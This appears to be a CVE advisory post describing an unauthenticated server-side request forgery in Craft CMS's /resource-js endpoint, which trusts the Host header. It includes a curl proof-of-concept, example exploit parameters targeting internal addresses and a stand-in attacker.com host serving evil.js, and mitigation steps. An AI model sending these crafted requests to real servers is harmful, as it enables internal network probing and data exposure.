Craft CMS, SSRF via Host Header, CVE(not specified) (critical)

Listen to this Post

How the CVE works:

The vulnerability exists in `AppController::actionResourceJs()` endpoint /resource-js. This endpoint proxies remote JavaScript resources without authentication. The function validates that the `url` parameter starts with assetManager->baseUrl. However, `baseUrl` is dynamically derived from the current request’s `Host` header. In default Craft CMS installations, the `trustedHosts` configuration array is empty, meaning the application fully trusts the client-supplied `Host` header. An attacker sends a crafted request with a malicious `Host` header pointing to an internal or external server (e.g., Host: attacker.com). The application computes `baseUrl` based on this attacker-controlled host. The attacker then supplies a `url` parameter that starts with that same malicious base URL (e.g., http://attacker.com/evil.js`). The prefix validation passes because the `url` begins with the derivedbaseUrl. Subsequently, the application uses Guzzle to perform a server-side HTTP request to the attacker-controlled URL. This results in Server-Side Request Forgery (SSRF). The attack does not require any string parsing bypass; it directly abuses host header trust. The endpoint is unauthenticated and publicly accessible, allowing any remote attacker to trigger internal HTTP requests, probe internal networks, or interact with loopback services. The default configuration is vulnerable; only explicit `trustedHosts` restrictions prevent the attack.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Craft CMS
Version: 5.9.12 (default)
Vulnerability: SSRF via Host
Severity: critical
date: 2025-04-14
<h2 style="color: blue;">Prediction: Patch within 48h</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics</h2>

Simulate vulnerable request
curl -H "Host: 127.0.0.1:9999" \
"http://target-craft.com/resource-js?url=http://127.0.0.1:9999/evil.js"
Internal listener (inside container)
python3 -m http.server 9999
OOB confirmation - check access logs
tail -f /tmp/http_server.log | grep "evil.js"

<h2 style="color: blue;">Exploit:</h2>
Send unauthenticated GET request to `/resource-js` with attacker-controlled `Host` header and matching `url` parameter. Example:
`Host: 192.168.1.1:8080` and
url=http://192.168.1.1:8080/admin`. Craft CMS proxies request, exposing internal services.

Protection from this CVE

  1. Configure `trustedHosts` in `config/general.php` with explicit allowed hosts.
  2. Update to Craft CMS ≥ 5.9.13 (if patch exists).
  3. Disable `/resource-js` via web server rules if not needed.
  4. Validate `Host` header against whitelist before any proxy logic.

Impact:

Full SSRF allows internal port scanning, access to metadata endpoints (e.g., AWS IMDS), local file retrieval via `file://` (if Guzzle allows), and internal service interaction. Can lead to sensitive data disclosure or lateral movement.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top